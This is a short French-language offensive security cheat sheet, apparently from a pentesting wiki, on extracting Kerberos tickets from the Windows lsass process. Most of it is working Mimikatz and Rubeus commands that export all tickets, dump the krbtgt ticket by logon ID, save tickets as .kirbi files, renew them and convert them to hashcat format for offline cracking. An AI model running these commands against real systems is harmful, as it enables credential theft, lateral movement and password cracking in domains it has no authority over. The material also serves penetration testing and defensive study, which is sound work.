Harvesting tickets from Windows

Les tickets dans Windows sont gérés et stockés par le processus lsass (Local Security Authority Subsystem Service), responsable de la gestion des politiques de sécurité. Pour extraire ces tickets, il est nécessaire d'interagir avec le processus lsass. Un utilisateur non administratif ne peut accéder qu'à ses propres tickets, tandis qu'un administrateur a le privilège d'extraire tous les tickets du système. Pour de telles opérations, les outils Mimikatz et Rubeus sont largement utilisés, chacun offrant différentes commandes et fonctionnalités.

Mimikatz

Mimikatz est un outil polyvalent qui peut interagir avec la sécurité de Windows. Il est utilisé non seulement pour extraire des tickets, mais aussi pour diverses autres opérations liées à la sécurité.

# Extracting tickets using Mimikatz
sekurlsa::tickets /export

Rubeus

Rubeus est un outil spécifiquement conçu pour l'interaction et la manipulation de Kerberos. Il est utilisé pour l'extraction et la gestion des tickets, ainsi que pour d'autres activités liées à Kerberos.

# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Listing all tickets
.\Rubeus.exe triage

# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))

# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>

# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>

Lors de l'utilisation de ces commandes, assurez-vous de remplacer les espaces réservés tels que <BASE64_TICKET> et <luid> par le ticket encodé en Base64 et l'ID de connexion respectivement. Ces outils offrent une fonctionnalité étendue pour gérer les tickets et interagir avec les mécanismes de sécurité de Windows.

Références

• https://www.tarlogic.com/en/blog/how-to-attack-kerberos/